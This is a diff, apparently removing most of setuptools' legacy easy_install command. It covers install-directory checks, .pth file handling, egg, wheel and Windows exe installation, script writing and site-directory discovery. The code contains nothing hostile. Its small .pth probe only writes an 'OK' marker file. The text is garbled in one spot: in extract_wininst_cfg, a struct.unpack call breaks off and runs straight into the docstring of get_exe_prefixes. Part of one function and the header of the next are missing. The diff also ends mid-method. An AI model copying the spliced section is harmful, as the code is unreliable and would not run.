if self.verbose != self.distribution.verbose: - log.set_verbosity(self.verbose) - try: - for spec in self.args: - self.easy_install(spec, not self.no_deps) - if self.record: - outputs = self.outputs - if self.root: # strip any package prefix - root_len = len(self.root) - for counter in range(len(outputs)): - outputs[counter] = outputs[counter][root_len:] - from distutils import file_util - - self.execute( - file_util.write_file, (self.record, outputs), - "writing list of installed files to '%s'" % - self.record - ) - self.warn_deprecated_options() - finally: - log.set_verbosity(self.distribution.verbose) - - def pseudo_tempname(self): - """Return a pseudo-tempname base in the install directory. - This code is intentionally naive; if a malicious party can write to - the target directory you're already in deep doodoo. - """ - try: - pid = os.getpid() - except Exception: - pid = random.randint(0, sys.maxsize) - return os.path.join(self.install_dir, "test-easy-install-%s" % pid) - - def warn_deprecated_options(self): - pass - - def check_site_dir(self): # noqa: C901 # is too complex (12) # FIXME - """Verify that self.install_dir is .pth-capable dir, if needed""" - - instdir = normalize_path(self.install_dir) - pth_file = os.path.join(instdir, 'easy-install.pth') - - if not os.path.exists(instdir): - try: - os.makedirs(instdir) - except (OSError, IOError): - self.cant_write_to_target() - - # Is it a configured, PYTHONPATH, implicit, or explicit site dir? - is_site_dir = instdir in self.all_site_dirs - - if not is_site_dir and not self.multi_version: - # No? Then directly test whether it does .pth file processing - is_site_dir = self.check_pth_processing() - else: - # make sure we can write to target dir - testfile = self.pseudo_tempname() + '.write-test' - test_exists = os.path.exists(testfile) - try: - if test_exists: - os.unlink(testfile) - open(testfile, 'w').close() - os.unlink(testfile) - except (OSError, IOError): - self.cant_write_to_target() - - if not is_site_dir and not self.multi_version: - # Can't install non-multi to non-site dir with easy_install - pythonpath = os.environ.get('PYTHONPATH', '') - log.warn(self.__no_default_msg, self.install_dir, pythonpath) - - if is_site_dir: - if self.pth_file is None: - self.pth_file = PthDistributions(pth_file, self.all_site_dirs) - else: - self.pth_file = None - - if self.multi_version and not os.path.exists(pth_file): - self.pth_file = None # don't create a .pth file - self.install_dir = instdir - - __cant_write_msg = textwrap.dedent(""" - can't create or remove files in install directory - - The following error occurred while trying to add or remove files in the - installation directory: - - %s - - The installation directory you specified (via --install-dir, --prefix, or - the distutils default setting) was: - - %s - """).lstrip() # noqa - - __not_exists_id = textwrap.dedent(""" - This directory does not currently exist. Please create it and try again, or - choose a different installation directory (using the -d or --install-dir - option). - """).lstrip() # noqa - - __access_msg = textwrap.dedent(""" - Perhaps your account does not have write access to this directory? If the - installation directory is a system-owned directory, you may need to sign in - as the administrator or "root" account. If you do not have administrative - access to this machine, you may wish to choose a different installation - directory, preferably one that is listed in your PYTHONPATH environment - variable. - - For information on other options, you may wish to consult the - documentation at: - - https://setuptools.readthedocs.io/en/latest/deprecated/easy_install.html - - Please make the appropriate changes for your system and try again. - """).lstrip() # noqa - - def cant_write_to_target(self): - msg = self.__cant_write_msg % (sys.exc_info()[1], self.install_dir,) - - if not os.path.exists(self.install_dir): - msg += '\n' + self.__not_exists_id - else: - msg += '\n' + self.__access_msg - raise DistutilsError(msg) - - def check_pth_processing(self): - """Empirically verify whether .pth files are supported in inst. dir""" - instdir = self.install_dir - log.info("Checking .pth file support in %s", instdir) - pth_file = self.pseudo_tempname() + ".pth" - ok_file = pth_file + '.ok' - ok_exists = os.path.exists(ok_file) - tmpl = _one_liner(""" - import os - f = open({ok_file!r}, 'w') - f.write('OK') - f.close() - """) + '\n' - try: - if ok_exists: - os.unlink(ok_file) - dirname = os.path.dirname(ok_file) - os.makedirs(dirname, exist_ok=True) - f = open(pth_file, 'w') - except (OSError, IOError): - self.cant_write_to_target() - else: - try: - f.write(tmpl.format(**locals())) - f.close() - f = None - executable = sys.executable - if os.name == 'nt': - dirname, basename = os.path.split(executable) - alt = os.path.join(dirname, 'pythonw.exe') - use_alt = ( - basename.lower() == 'python.exe' and - os.path.exists(alt) - ) - if use_alt: - # use pythonw.exe to avoid opening a console window - executable = alt - - from distutils.spawn import spawn - - spawn([executable, '-E', '-c', 'pass'], 0) - - if os.path.exists(ok_file): - log.info( - "TEST PASSED: %s appears to support .pth files", - instdir - ) - return True - finally: - if f: - f.close() - if os.path.exists(ok_file): - os.unlink(ok_file) - if os.path.exists(pth_file): - os.unlink(pth_file) - if not self.multi_version: - log.warn("TEST FAILED: %s does NOT support .pth files", instdir) - return False - - def install_egg_scripts(self, dist): - """Write all the scripts for `dist`, unless scripts are excluded""" - if not self.exclude_scripts and dist.metadata_isdir('scripts'): - for script_name in dist.metadata_listdir('scripts'): - if dist.metadata_isdir('scripts/' + script_name): - # The "script" is a directory, likely a Python 3 - # __pycache__ directory, so skip it. - continue - self.install_script( - dist, script_name, - dist.get_metadata('scripts/' + script_name) - ) - self.install_wrapper_scripts(dist) - - def add_output(self, path): - if os.path.isdir(path): - for base, dirs, files in os.walk(path): - for filename in files: - self.outputs.append(os.path.join(base, filename)) - else: - self.outputs.append(path) - - def not_editable(self, spec): - if self.editable: - raise DistutilsArgError( - "Invalid argument %r: you can't use filenames or URLs " - "with --editable (except via the --find-links option)." - % (spec,) - ) - - def check_editable(self, spec): - if not self.editable: - return - - if os.path.exists(os.path.join(self.build_directory, spec.key)): - raise DistutilsArgError( - "%r already exists in %s; can't do a checkout there" % - (spec.key, self.build_directory) - ) - - @contextlib.contextmanager - def _tmpdir(self): - tmpdir = tempfile.mkdtemp(prefix=u"easy_install-") - try: - # cast to str as workaround for #709 and #710 and #712 - yield str(tmpdir) - finally: - os.path.exists(tmpdir) and rmtree(tmpdir) - - def easy_install(self, spec, deps=False): - with self._tmpdir() as tmpdir: - if not isinstance(spec, Requirement): - if URL_SCHEME(spec): - # It's a url, download it to tmpdir and process - self.not_editable(spec) - dl = self.package_index.download(spec, tmpdir) - return self.install_item(None, dl, tmpdir, deps, True) - - elif os.path.exists(spec): - # Existing file or directory, just process it directly - self.not_editable(spec) - return self.install_item(None, spec, tmpdir, deps, True) - else: - spec = parse_requirement_arg(spec) - - self.check_editable(spec) - dist = self.package_index.fetch_distribution( - spec, tmpdir, self.upgrade, self.editable, - not self.always_copy, self.local_index - ) - if dist is None: - msg = "Could not find suitable distribution for %r" % spec - if self.always_copy: - msg += " (--always-copy skips system and development eggs)" - raise DistutilsError(msg) - elif dist.precedence == DEVELOP_DIST: - # .egg-info dists don't need installing, just process deps - self.process_distribution(spec, dist, deps, "Using") - return dist - else: - return self.install_item(spec, dist.location, tmpdir, deps) - - def install_item(self, spec, download, tmpdir, deps, install_needed=False): - - # Installation is also needed if file in tmpdir or is not an egg - install_needed = install_needed or self.always_copy - install_needed = install_needed or os.path.dirname(download) == tmpdir - install_needed = install_needed or not download.endswith('.egg') - install_needed = install_needed or ( - self.always_copy_from is not None and - os.path.dirname(normalize_path(download)) == - normalize_path(self.always_copy_from) - ) - - if spec and not install_needed: - # at this point, we know it's a local .egg, we just don't know if - # it's already installed. - for dist in self.local_index[spec.project_name]: - if dist.location == download: - break - else: - install_needed = True # it's not in the local index - - log.info("Processing %s", os.path.basename(download)) - - if install_needed: - dists = self.install_eggs(spec, download, tmpdir) - for dist in dists: - self.process_distribution(spec, dist, deps) - else: - dists = [self.egg_distribution(download)] - self.process_distribution(spec, dists[0], deps, "Using") - - if spec is not None: - for dist in dists: - if dist in spec: - return dist - - def select_scheme(self, name): - """Sets the install directories by applying the install schemes.""" - # it's the caller's problem if they supply a bad name! - scheme = INSTALL_SCHEMES[name] - for key in SCHEME_KEYS: - attrname = 'install_' + key - if getattr(self, attrname) is None: - setattr(self, attrname, scheme[key]) - - # FIXME: 'easy_install.process_distribution' is too complex (12) - def process_distribution( # noqa: C901 - self, requirement, dist, deps=True, *info, - ): - self.update_pth(dist) - self.package_index.add(dist) - if dist in self.local_index[dist.key]: - self.local_index.remove(dist) - self.local_index.add(dist) - self.install_egg_scripts(dist) - self.installed_projects[dist.key] = dist - log.info(self.installation_report(requirement, dist, *info)) - if (dist.has_metadata('dependency_links.txt') and - not self.no_find_links): - self.package_index.add_find_links( - dist.get_metadata_lines('dependency_links.txt') - ) - if not deps and not self.always_copy: - return - elif requirement is not None and dist.key != requirement.key: - log.warn("Skipping dependencies for %s", dist) - return # XXX this is not the distribution we were looking for - elif requirement is None or dist not in requirement: - # if we wound up with a different version, resolve what we've got - distreq = dist.as_requirement() - requirement = Requirement(str(distreq)) - log.info("Processing dependencies for %s", requirement) - try: - distros = WorkingSet([]).resolve( - [requirement], self.local_index, self.easy_install - ) - except DistributionNotFound as e: - raise DistutilsError(str(e)) from e - except VersionConflict as e: - raise DistutilsError(e.report()) from e - if self.always_copy or self.always_copy_from: - # Force all the relevant distros to be copied or activated - for dist in distros: - if dist.key not in self.installed_projects: - self.easy_install(dist.as_requirement()) - log.info("Finished processing dependencies for %s", requirement) - - def should_unzip(self, dist): - if self.zip_ok is not None: - return not self.zip_ok - if dist.has_metadata('not-zip-safe'): - return True - if not dist.has_metadata('zip-safe'): - return True - return False - - def maybe_move(self, spec, dist_filename, setup_base): - dst = os.path.join(self.build_directory, spec.key) - if os.path.exists(dst): - msg = ( - "%r already exists in %s; build directory %s will not be kept" - ) - log.warn(msg, spec.key, self.build_directory, setup_base) - return setup_base - if os.path.isdir(dist_filename): - setup_base = dist_filename - else: - if os.path.dirname(dist_filename) == setup_base: - os.unlink(dist_filename) # get it out of the tmp dir - contents = os.listdir(setup_base) - if len(contents) == 1: - dist_filename = os.path.join(setup_base, contents[0]) - if os.path.isdir(dist_filename): - # if the only thing there is a directory, move it instead - setup_base = dist_filename - ensure_directory(dst) - shutil.move(setup_base, dst) - return dst - - def install_wrapper_scripts(self, dist): - if self.exclude_scripts: - return - for args in ScriptWriter.best().get_args(dist): - self.write_script(*args) - - def install_script(self, dist, script_name, script_text, dev_path=None): - """Generate a legacy script wrapper and install it""" - spec = str(dist.as_requirement()) - is_script = is_python_script(script_text, script_name) - - if is_script: - body = self._load_template(dev_path) % locals() - script_text = ScriptWriter.get_header(script_text) + body - self.write_script(script_name, _to_bytes(script_text), 'b') - - @staticmethod - def _load_template(dev_path): - """ - There are a couple of template scripts in the package. This - function loads one of them and prepares it for use. - """ - # See https://github.com/pypa/setuptools/issues/134 for info - # on script file naming and downstream issues with SVR4 - name = 'script.tmpl' - if dev_path: - name = name.replace('.tmpl', ' (dev).tmpl') - - raw_bytes = resource_string('setuptools', name) - return raw_bytes.decode('utf-8') - - def write_script(self, script_name, contents, mode="t", blockers=()): - """Write an executable file to the scripts directory""" - self.delete_blockers( # clean up old .py/.pyw w/o a script - [os.path.join(self.script_dir, x) for x in blockers] - ) - log.info("Installing %s script to %s", script_name, self.script_dir) - target = os.path.join(self.script_dir, script_name) - self.add_output(target) - - if self.dry_run: - return - - mask = current_umask() - ensure_directory(target) - if os.path.exists(target): - os.unlink(target) - with open(target, "w" + mode) as f: - f.write(contents) - chmod(target, 0o777 - mask) - - def install_eggs(self, spec, dist_filename, tmpdir): - # .egg dirs or files are already built, so just return them - installer_map = { - '.egg': self.install_egg, - '.exe': self.install_exe, - '.whl': self.install_wheel, - } - try: - install_dist = installer_map[ - dist_filename.lower()[-4:] - ] - except KeyError: - pass - else: - return [install_dist(dist_filename, tmpdir)] - - # Anything else, try to extract and build - setup_base = tmpdir - if os.path.isfile(dist_filename) and not dist_filename.endswith('.py'): - unpack_archive(dist_filename, tmpdir, self.unpack_progress) - elif os.path.isdir(dist_filename): - setup_base = os.path.abspath(dist_filename) - - if (setup_base.startswith(tmpdir) # something we downloaded - and self.build_directory and spec is not None): - setup_base = self.maybe_move(spec, dist_filename, setup_base) - - # Find the setup.py file - setup_script = os.path.join(setup_base, 'setup.py') - - if not os.path.exists(setup_script): - setups = glob(os.path.join(setup_base, '*', 'setup.py')) - if not setups: - raise DistutilsError( - "Couldn't find a setup script in %s" % - os.path.abspath(dist_filename) - ) - if len(setups) > 1: - raise DistutilsError( - "Multiple setup scripts in %s" % - os.path.abspath(dist_filename) - ) - setup_script = setups[0] - - # Now run it, and return the result - if self.editable: - log.info(self.report_editable(spec, setup_script)) - return [] - else: - return self.build_and_install(setup_script, setup_base) - - def egg_distribution(self, egg_path): - if os.path.isdir(egg_path): - metadata = PathMetadata(egg_path, os.path.join(egg_path, - 'EGG-INFO')) - else: - metadata = EggMetadata(zipimport.zipimporter(egg_path)) - return Distribution.from_filename(egg_path, metadata=metadata) - - # FIXME: 'easy_install.install_egg' is too complex (11) - def install_egg(self, egg_path, tmpdir): # noqa: C901 - destination = os.path.join( - self.install_dir, - os.path.basename(egg_path), - ) - destination = os.path.abspath(destination) - if not self.dry_run: - ensure_directory(destination) - - dist = self.egg_distribution(egg_path) - if not samefile(egg_path, destination): - if os.path.isdir(destination) and not os.path.islink(destination): - dir_util.remove_tree(destination, dry_run=self.dry_run) - elif os.path.exists(destination): - self.execute( - os.unlink, - (destination,), - "Removing " + destination, - ) - try: - new_dist_is_zipped = False - if os.path.isdir(egg_path): - if egg_path.startswith(tmpdir): - f, m = shutil.move, "Moving" - else: - f, m = shutil.copytree, "Copying" - elif self.should_unzip(dist): - self.mkpath(destination) - f, m = self.unpack_and_compile, "Extracting" - else: - new_dist_is_zipped = True - if egg_path.startswith(tmpdir): - f, m = shutil.move, "Moving" - else: - f, m = shutil.copy2, "Copying" - self.execute( - f, - (egg_path, destination), - (m + " %s to %s") % ( - os.path.basename(egg_path), - os.path.dirname(destination) - ), - ) - update_dist_caches( - destination, - fix_zipimporter_caches=new_dist_is_zipped, - ) - except Exception: - update_dist_caches(destination, fix_zipimporter_caches=False) - raise - - self.add_output(destination) - return self.egg_distribution(destination) - - def install_exe(self, dist_filename, tmpdir): - # See if it's valid, get data - cfg = extract_wininst_cfg(dist_filename) - if cfg is None: - raise DistutilsError( - "%s is not a valid distutils Windows .exe" % dist_filename - ) - # Create a dummy distribution object until we build the real distro - dist = Distribution( - None, - project_name=cfg.get('metadata', 'name'), - version=cfg.get('metadata', 'version'), platform=get_platform(), - ) - - # Convert the .exe to an unpacked egg - egg_path = os.path.join(tmpdir, dist.egg_name() + '.egg') - dist.location = egg_path - egg_tmp = egg_path + '.tmp' - _egg_info = os.path.join(egg_tmp, 'EGG-INFO') - pkg_inf = os.path.join(_egg_info, 'PKG-INFO') - ensure_directory(pkg_inf) # make sure EGG-INFO dir exists - dist._provider = PathMetadata(egg_tmp, _egg_info) # XXX - self.exe_to_egg(dist_filename, egg_tmp) - - # Write EGG-INFO/PKG-INFO - if not os.path.exists(pkg_inf): - f = open(pkg_inf, 'w') - f.write('Metadata-Version: 1.0\n') - for k, v in cfg.items('metadata'): - if k != 'target_version': - f.write('%s: %s\n' % (k.replace('_', '-').title(), v)) - f.close() - script_dir = os.path.join(_egg_info, 'scripts') - # delete entry-point scripts to avoid duping - self.delete_blockers([ - os.path.join(script_dir, args[0]) - for args in ScriptWriter.get_args(dist) - ]) - # Build .egg file from tmpdir - bdist_egg.make_zipfile( - egg_path, egg_tmp, verbose=self.verbose, dry_run=self.dry_run, - ) - # install the .egg - return self.install_egg(egg_path, tmpdir) - - # FIXME: 'easy_install.exe_to_egg' is too complex (12) - def exe_to_egg(self, dist_filename, egg_tmp): # noqa: C901 - """Extract a bdist_wininst to the directories an egg would use""" - # Check for .pth file and set up prefix translations - prefixes = get_exe_prefixes(dist_filename) - to_compile = [] - native_libs = [] - top_level = {} - - def process(src, dst): - s = src.lower() - for old, new in prefixes: - if s.startswith(old): - src = new + src[len(old):] - parts = src.split('/') - dst = os.path.join(egg_tmp, *parts) - dl = dst.lower() - if dl.endswith('.pyd') or dl.endswith('.dll'): - parts[-1] = bdist_egg.strip_module(parts[-1]) - top_level[os.path.splitext(parts[0])[0]] = 1 - native_libs.append(src) - elif dl.endswith('.py') and old != 'SCRIPTS/': - top_level[os.path.splitext(parts[0])[0]] = 1 - to_compile.append(dst) - return dst - if not src.endswith('.pth'): - log.warn("WARNING: can't process %s", src) - return None - - # extract, tracking .pyd/.dll->native_libs and .py -> to_compile - unpack_archive(dist_filename, egg_tmp, process) - stubs = [] - for res in native_libs: - if res.lower().endswith('.pyd'): # create stubs for .pyd's - parts = res.split('/') - resource = parts[-1] - parts[-1] = bdist_egg.strip_module(parts[-1]) + '.py' - pyfile = os.path.join(egg_tmp, *parts) - to_compile.append(pyfile) - stubs.append(pyfile) - bdist_egg.write_stub(resource, pyfile) - self.byte_compile(to_compile) # compile .py's - bdist_egg.write_safety_flag( - os.path.join(egg_tmp, 'EGG-INFO'), - bdist_egg.analyze_egg(egg_tmp, stubs)) # write zip-safety flag - - for name in 'top_level', 'native_libs': - if locals()[name]: - txt = os.path.join(egg_tmp, 'EGG-INFO', name + '.txt') - if not os.path.exists(txt): - f = open(txt, 'w') - f.write('\n'.join(locals()[name]) + '\n') - f.close() - - def install_wheel(self, wheel_path, tmpdir): - wheel = Wheel(wheel_path) - assert wheel.is_compatible() - destination = os.path.join(self.install_dir, wheel.egg_name()) - destination = os.path.abspath(destination) - if not self.dry_run: - ensure_directory(destination) - if os.path.isdir(destination) and not os.path.islink(destination): - dir_util.remove_tree(destination, dry_run=self.dry_run) - elif os.path.exists(destination): - self.execute( - os.unlink, - (destination,), - "Removing " + destination, - ) - try: - self.execute( - wheel.install_as_egg, - (destination,), - ("Installing %s to %s") % ( - os.path.basename(wheel_path), - os.path.dirname(destination) - ), - ) - finally: - update_dist_caches(destination, fix_zipimporter_caches=False) - self.add_output(destination) - return self.egg_distribution(destination) - - __mv_warning = textwrap.dedent(""" - Because this distribution was installed --multi-version, before you can - import modules from this package in an application, you will need to - 'import pkg_resources' and then use a 'require()' call similar to one of - these examples, in order to select the desired version: - - pkg_resources.require("%(name)s") # latest installed version - pkg_resources.require("%(name)s==%(version)s") # this exact version - pkg_resources.require("%(name)s>=%(version)s") # this version or higher - """).lstrip() # noqa - - __id_warning = textwrap.dedent(""" - Note also that the installation directory must be on sys.path at runtime for - this to work. (e.g. by being the application's script directory, by being on - PYTHONPATH, or by being added to sys.path by your code.) - """) # noqa - - def installation_report(self, req, dist, what="Installed"): - """Helpful installation message for display to package users""" - msg = "\n%(what)s %(eggloc)s%(extras)s" - if self.multi_version and not self.no_report: - msg += '\n' + self.__mv_warning - if self.install_dir not in map(normalize_path, sys.path): - msg += '\n' + self.__id_warning - - eggloc = dist.location - name = dist.project_name - version = dist.version - extras = '' # TODO: self.report_extras(req, dist) - return msg % locals() - - __editable_msg = textwrap.dedent(""" - Extracted editable version of %(spec)s to %(dirname)s - - If it uses setuptools in its setup script, you can activate it in - "development" mode by going to that directory and running:: - - %(python)s setup.py develop - - See the setuptools documentation for the "develop" command for more info. - """).lstrip() # noqa - - def report_editable(self, spec, setup_script): - dirname = os.path.dirname(setup_script) - python = sys.executable - return '\n' + self.__editable_msg % locals() - - def run_setup(self, setup_script, setup_base, args): - sys.modules.setdefault('distutils.command.bdist_egg', bdist_egg) - sys.modules.setdefault('distutils.command.egg_info', egg_info) - - args = list(args) - if self.verbose > 2: - v = 'v' * (self.verbose - 1) - args.insert(0, '-' + v) - elif self.verbose < 2: - args.insert(0, '-q') - if self.dry_run: - args.insert(0, '-n') - log.info( - "Running %s %s", setup_script[len(setup_base) + 1:], ' '.join(args) - ) - try: - run_setup(setup_script, args) - except SystemExit as v: - raise DistutilsError( - "Setup script exited with %s" % (v.args[0],) - ) from v - - def build_and_install(self, setup_script, setup_base): - args = ['bdist_egg', '--dist-dir'] - - dist_dir = tempfile.mkdtemp( - prefix='egg-dist-tmp-', dir=os.path.dirname(setup_script) - ) - try: - self._set_fetcher_options(os.path.dirname(setup_script)) - args.append(dist_dir) - - self.run_setup(setup_script, setup_base, args) - all_eggs = Environment([dist_dir]) - eggs = [] - for key in all_eggs: - for dist in all_eggs[key]: - eggs.append(self.install_egg(dist.location, setup_base)) - if not eggs and not self.dry_run: - log.warn("No eggs found in %s (setup script problem?)", - dist_dir) - return eggs - finally: - rmtree(dist_dir) - log.set_verbosity(self.verbose) # restore our log verbosity - - def _set_fetcher_options(self, base): - """ - When easy_install is about to run bdist_egg on a source dist, that - source dist might have 'setup_requires' directives, requiring - additional fetching. Ensure the fetcher options given to easy_install - are available to that command as well. - """ - # find the fetch options from easy_install and write them out - # to the setup.cfg file. - ei_opts = self.distribution.get_option_dict('easy_install').copy() - fetch_directives = ( - 'find_links', 'site_dirs', 'index_url', 'optimize', 'allow_hosts', - ) - fetch_options = {} - for key, val in ei_opts.items(): - if key not in fetch_directives: - continue - fetch_options[key] = val[1] - # create a settings dictionary suitable for `edit_config` - settings = dict(easy_install=fetch_options) - cfg_filename = os.path.join(base, 'setup.cfg') - setopt.edit_config(cfg_filename, settings) - - def update_pth(self, dist): # noqa: C901 # is too complex (11) # FIXME - if self.pth_file is None: - return - - for d in self.pth_file[dist.key]: # drop old entries - if not self.multi_version and d.location == dist.location: - continue - - log.info("Removing %s from easy-install.pth file", d) - self.pth_file.remove(d) - if d.location in self.shadow_path: - self.shadow_path.remove(d.location) - - if not self.multi_version: - if dist.location in self.pth_file.paths: - log.info( - "%s is already the active version in easy-install.pth", - dist, - ) - else: - log.info("Adding %s to easy-install.pth file", dist) - self.pth_file.add(dist) # add new entry - if dist.location not in self.shadow_path: - self.shadow_path.append(dist.location) - - if self.dry_run: - return - - self.pth_file.save() - - if dist.key != 'setuptools': - return - - # Ensure that setuptools itself never becomes unavailable! - # XXX should this check for latest version? - filename = os.path.join(self.install_dir, 'setuptools.pth') - if os.path.islink(filename): - os.unlink(filename) - with open(filename, 'wt') as f: - f.write(self.pth_file.make_relative(dist.location) + '\n') - - def unpack_progress(self, src, dst): - # Progress filter for unpacking - log.debug("Unpacking %s to %s", src, dst) - return dst # only unpack-and-compile skips files for dry run - - def unpack_and_compile(self, egg_path, destination): - to_compile = [] - to_chmod = [] - - def pf(src, dst): - if dst.endswith('.py') and not src.startswith('EGG-INFO/'): - to_compile.append(dst) - elif dst.endswith('.dll') or dst.endswith('.so'): - to_chmod.append(dst) - self.unpack_progress(src, dst) - return not self.dry_run and dst or None - - unpack_archive(egg_path, destination, pf) - self.byte_compile(to_compile) - if not self.dry_run: - for f in to_chmod: - mode = ((os.stat(f)[stat.ST_MODE]) | 0o555) & 0o7755 - chmod(f, mode) - - def byte_compile(self, to_compile): - if sys.dont_write_bytecode: - return - - from distutils.util import byte_compile - - try: - # try to make the byte compile messages quieter - log.set_verbosity(self.verbose - 1) - - byte_compile(to_compile, optimize=0, force=1, dry_run=self.dry_run) - if self.optimize: - byte_compile( - to_compile, optimize=self.optimize, force=1, - dry_run=self.dry_run, - ) - finally: - log.set_verbosity(self.verbose) # restore original verbosity - - __no_default_msg = textwrap.dedent(""" - bad install directory or PYTHONPATH - - You are attempting to install a package to a directory that is not - on PYTHONPATH and which Python does not read ".pth" files from. The - installation directory you specified (via --install-dir, --prefix, or - the distutils default setting) was: - - %s - - and your PYTHONPATH environment variable currently contains: - - %r - - Here are some of your options for correcting the problem: - - * You can choose a different installation directory, i.e., one that is - on PYTHONPATH or supports .pth files - - * You can add the installation directory to the PYTHONPATH environment - variable. (It must then also be on PYTHONPATH whenever you run - Python and want to use the package(s) you are installing.) - - * You can set up the installation directory to support ".pth" files by - using one of the approaches described here: - - https://setuptools.readthedocs.io/en/latest/deprecated/easy_install.html#custom-installation-locations - - - Please make the appropriate changes for your system and try again. - """).strip() - - def create_home_path(self): - """Create directories under ~.""" - if not self.user: - return - home = convert_path(os.path.expanduser("~")) - for name, path in self.config_vars.items(): - if path.startswith(home) and not os.path.isdir(path): - self.debug_print("os.makedirs('%s', 0o700)" % path) - os.makedirs(path, 0o700) - - INSTALL_SCHEMES = dict( - posix=dict( - install_dir='$base/lib/python$py_version_short/site-packages', - script_dir='$base/bin', - ), - ) - - DEFAULT_SCHEME = dict( - install_dir='$base/Lib/site-packages', - script_dir='$base/Scripts', - ) - - def _expand(self, *attrs): - config_vars = self.get_finalized_command('install').config_vars - - if self.prefix: - # Set default install_dir/scripts from --prefix - config_vars = config_vars.copy() - config_vars['base'] = self.prefix - scheme = self.INSTALL_SCHEMES.get(os.name, self.DEFAULT_SCHEME) - for attr, val in scheme.items(): - if getattr(self, attr, None) is None: - setattr(self, attr, val) - - from distutils.util import subst_vars - - for attr in attrs: - val = getattr(self, attr) - if val is not None: - val = subst_vars(val, config_vars) - if os.name == 'posix': - val = os.path.expanduser(val) - setattr(self, attr, val) - - -def _pythonpath(): - items = os.environ.get('PYTHONPATH', '').split(os.pathsep) - return filter(None, items) - - -def get_site_dirs(): - """ - Return a list of 'site' dirs - """ - - sitedirs = [] - - # start with PYTHONPATH - sitedirs.extend(_pythonpath()) - - prefixes = [sys.prefix] - if sys.exec_prefix != sys.prefix: - prefixes.append(sys.exec_prefix) - for prefix in prefixes: - if not prefix: - continue - - if sys.platform in ('os2emx', 'riscos'): - sitedirs.append(os.path.join(prefix, "Lib", "site-packages")) - elif os.sep == '/': - sitedirs.extend([ - os.path.join( - prefix, - "lib", - "python{}.{}".format(*sys.version_info), - "site-packages", - ), - os.path.join(prefix, "lib", "site-python"), - ]) - else: - sitedirs.extend([ - prefix, - os.path.join(prefix, "lib", "site-packages"), - ]) - if sys.platform != 'darwin': - continue - - # for framework builds *only* we add the standard Apple - # locations. Currently only per-user, but /Library and - # /Network/Library could be added too - if 'Python.framework' not in prefix: - continue - - home = os.environ.get('HOME') - if not home: - continue - - home_sp = os.path.join( - home, - 'Library', - 'Python', - '{}.{}'.format(*sys.version_info), - 'site-packages', - ) - sitedirs.append(home_sp) - lib_paths = get_path('purelib'), get_path('platlib') - - sitedirs.extend(s for s in lib_paths if s not in sitedirs) - - if site.ENABLE_USER_SITE: - sitedirs.append(site.USER_SITE) - - with contextlib.suppress(AttributeError): - sitedirs.extend(site.getsitepackages()) - - sitedirs = list(map(normalize_path, sitedirs)) - - return sitedirs - - -def expand_paths(inputs): # noqa: C901 # is too complex (11) # FIXME - """Yield sys.path directories that might contain "old-style" packages""" - - seen = {} - - for dirname in inputs: - dirname = normalize_path(dirname) - if dirname in seen: - continue - - seen[dirname] = 1 - if not os.path.isdir(dirname): - continue - - files = os.listdir(dirname) - yield dirname, files - - for name in files: - if not name.endswith('.pth'): - # We only care about the .pth files - continue - if name in ('easy-install.pth', 'setuptools.pth'): - # Ignore .pth files that we control - continue - - # Read the .pth file - f = open(os.path.join(dirname, name)) - lines = list(yield_lines(f)) - f.close() - - # Yield existing non-dupe, non-import directory lines from it - for line in lines: - if line.startswith("import"): - continue - - line = normalize_path(line.rstrip()) - if line in seen: - continue - - seen[line] = 1 - if not os.path.isdir(line): - continue - - yield line, os.listdir(line) - - -def extract_wininst_cfg(dist_filename): - """Extract configuration data from a bdist_wininst .exe - - Returns a configparser.RawConfigParser, or None - """ - f = open(dist_filename, 'rb') - try: - endrec = zipfile._EndRecData(f) - if endrec is None: - return None - - prepended = (endrec[9] - endrec[5]) - endrec[6] - if prepended < 12: # no wininst data here - return None - f.seek(prepended - 12) - - tag, cfglen, bmlen = struct.unpack("egg path translations for a given .exe file""" - - prefixes = [ - ('PURELIB/', ''), - ('PLATLIB/pywin32_system32', ''), - ('PLATLIB/', ''), - ('SCRIPTS/', 'EGG-INFO/scripts/'), - ('DATA/lib/site-packages', ''), - ] - z = zipfile.ZipFile(exe_filename) - try: - for info in z.infolist(): - name = info.filename - parts = name.split('/') - if len(parts) == 3 and parts[2] == 'PKG-INFO': - if parts[1].endswith('.egg-info'): - prefixes.insert(0, ('/'.join(parts[:2]), 'EGG-INFO/')) - break - if len(parts) != 2 or not name.endswith('.pth'): - continue - if name.endswith('-nspkg.pth'): - continue - if parts[0].upper() in ('PURELIB', 'PLATLIB'): - contents = z.read(name).decode() - for pth in yield_lines(contents): - pth = pth.strip().replace('\\', '/') - if not pth.startswith('import'): - prefixes.append((('%s/%s/' % (parts[0], pth)), '')) - finally: - z.close() - prefixes = [(x.lower(), y) for x, y in prefixes] - prefixes.sort() - prefixes.reverse() - return prefixes - - -class PthDistributions(Environment): - """A .pth file with Distribution paths in it""" - - dirty = False - - def __init__(self, filename, sitedirs=()): - self.filename = filename - self.sitedirs = list(map(normalize_path, sitedirs)) - self.basedir = normalize_path(os.path.dirname(self.filename)) - self._load() - Environment.__init__(self, [], None, None) - for path in yield_lines(self.paths): - list(map(self.add, find_distributions(path, True))) - - def _load(self): - self.paths = [] - saw_import = False - seen = dict.fromkeys(self.sitedirs) - if os.path.isfile(self.filename): - f = open(self.filename, 'rt') - for line in f: - if line.startswith('import'): - saw_import = True - continue - path = line.rstrip() - self.paths.append(path) - if not path.strip() or path.strip().startswith('#'): - continue - # skip non-existent paths, in case somebody deleted a package - # manually, and duplicate paths as well - path = self.paths[-1] = normalize_path( - os.path.join(self.basedir, path) - ) - if not os.path.exists(path) or path in seen: - self.paths.pop() # skip it - self.dirty = True # we cleaned up, so we're dirty now :) - continue - seen[path] = 1 - f.close() - - if self.paths and not saw_import: - self.dirty = True # ensure anything we touch has import wrappers - while self.paths and not self.paths[-1].strip(): - self.paths.pop() - - def save(self): - """Write changed .pth file back to disk""" - if not self.dirty: - return - - rel_paths = list(map(self.make_relative, self.paths)) - if rel_paths: - log.debug("Saving %s", self.filename) - lines = self._wrap_lines(rel_paths) - data = '\n'.join(lines) + '\n' - - if os.path.islink(self.filename): - os.unlink(self.filename) - with open(self.filename, 'wt') as f: - f.write(data) - - elif os.path.exists(self.filename): - log.debug("Deleting empty %s", self.filename) - os.unlink(self.filename) - - self.dirty = False - - @staticmethod - def _wrap_lines(lines): - return lines - - def add(self, dist): - """Add `dist` to the distribution map""" - new_path = ( - dist.location not in self.paths and ( - dist.location not in self.sitedirs or - # account for '.' being in PYTHONPATH - dist.location == os.getcwd() - ) - ) - if new_path: - self.paths.append(dist.location) - self.dirty = True - Environment.add(self, dist) - - def remove(self, dist): - """Remove `dist` from the distribution map""" - while dist.location in self.paths: - 